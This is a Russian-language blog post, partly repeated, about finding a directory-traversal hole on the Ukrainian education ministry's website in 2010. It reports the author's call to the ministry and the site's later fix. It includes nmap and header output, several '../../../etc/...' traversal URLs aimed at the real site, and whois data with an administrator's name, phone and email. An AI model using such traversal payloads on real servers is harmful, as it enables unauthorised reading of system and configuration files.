Сегодня товарищи поделились интересной ссылкой
Стало интересно глянуть, а чего там открыто?
Бесхитростно:
Что-ж… Тоже вариант… 80 порт и только… Жаль…
Ну тогда стал прорезаться просто исследовательский азарт:
Позвонил… Представился (А от кого мне скрываться и зачем?). Попытался рассказать. На что услышал в ответ, что у них есть такая дыра, но никакой опасности она не представляет, что это только read only и т.п. Ну я ответил просто: «Да(?), ну ладно»…
Потом уже глянул, что этой дыре «в обед сто лет». Ну что-ж, раз никого такие вещи не заботят, то отчего они должны заботить меня, разве мне больше всех надо?
Но вот о чём подумалось. В принципе это не критичный сайт, не критичный проект. Но вот если в течении двух лет людям просто лень убрать дыры (не говорю про уязвимости) то, что может произойти если вдруг начнутся внедряться более другие, более весомые образовательные и другие проекты? Сказали, что сайт разрабатывал какой-то институт, а мне подумалось: какой-то студент сдал сессию! :( Печально всё это…
UPD: Оказывается на хабре уже слегка раскрывалась эта тема…
UPD: Дыру на сайте, как говорят, прикрыли. Прикрыли буквально сразу же после того как почувствовали хаброэфект:
Стало интересно глянуть, а чего там открыто?
Бесхитростно:
$ nmap www.mon.gov.ua Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2010-04-09 10:40 EEST Interesting ports on 212.111.193.189: Not shown: 1679 filtered ports PORT STATE SERVICE 80/tcp open http Nmap finished: 1 IP address (1 host up) scanned in 76.253 seconds
Что-ж… Тоже вариант… 80 порт и только… Жаль…
$ w3m -dump_head www.mon.gov.ua HTTP/1.1 200 OK Date: Fri, 09 Apr 2010 07:43:50 GMT Server: Apache/2.2.6 (Fedora) X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html
Ну тогда стал прорезаться просто исследовательский азарт:
- www.mon.gov.ua/main.php?query=../../../etc/rc
- www.mon.gov.ua/main.php?query=../../../etc/rc.local
- www.mon.gov.ua/main.php?query=../../../etc/ssh/ssh_config
- www.mon.gov.ua/main.php?query=../../../proc/cpuinfo
- www.mon.gov.ua/main.php?query=../../../proc/meminfo
$ whois mon.gov.ua % This is the Ukrainian Whois query server #F. % Rights restricted by copyright. % % % .UA whois % Domain Record: % ============= domain: mon.gov.ua admin-c: AVB40-UANIC tech-c: AVB40-UANIC status: OK-UNTIL 20100605000000 nserver: ns.secondary.net.ua nserver: ns.mon.gov.ua remark: Ministry of Education and Science of Ukraine remark: Міністерство освіти і науки України changed: UARR149-UANIC 20090713150319 source: UANIC % Glue Record: % =========== nserver: ns.mon.gov.ua ip-addr: 88.81.234.94 % Administrative Contact: % ====================== nic-handle: AVB40-UANIC person: Анатолій Валентинович Бортніков address: Шевченка Тараса, 16 address: 01601 КИЇВ address: UA phone: +380 (44) 2463909 e-mail: irvin@mon.gov.ua mnt-by: NONE changed: AVB40-UANIC 20090710174047 source: UANIC % Technical Contact: % ================= nic-handle: AVB40-UANIC person: Анатолій Валентинович Бортніков address: Шевченка Тараса, 16 address: 01601 КИЇВ address: UA phone: +380 (44) 2463909 e-mail: irvin@mon.gov.ua mnt-by: NONE changed: AVB40-UANIC 20090710174047 source: UANIC % % .UA whois
Позвонил… Представился (А от кого мне скрываться и зачем?). Попытался рассказать. На что услышал в ответ, что у них есть такая дыра, но никакой опасности она не представляет, что это только read only и т.п. Ну я ответил просто: «Да(?), ну ладно»…
Потом уже глянул, что этой дыре «в обед сто лет». Ну что-ж, раз никого такие вещи не заботят, то отчего они должны заботить меня, разве мне больше всех надо?
Но вот о чём подумалось. В принципе это не критичный сайт, не критичный проект. Но вот если в течении двух лет людям просто лень убрать дыры (не говорю про уязвимости) то, что может произойти если вдруг начнутся внедряться более другие, более весомые образовательные и другие проекты? Сказали, что сайт разрабатывал какой-то институт, а мне подумалось: какой-то студент сдал сессию! :( Печально всё это…
UPD: Оказывается на хабре уже слегка раскрывалась эта тема…
UPD: Дыру на сайте, как говорят, прикрыли. Прикрыли буквально сразу же после того как почувствовали хаброэфект:
Спасибо за информацию!Спасибо хабру, мы делаем этот мир лучше!
Наши программисты уже занимаются кодом…
К сожелению за сегодня можем не успеть, дело в том что автор сайта уволился 2 года назад…
Пока что мне придется захлопнуть на фаерволе весь перечень атаковавших (около 2500) адресов, чтобы сайт не рухнул на выходных.
Понимаю что некрасивое решение, но временно так.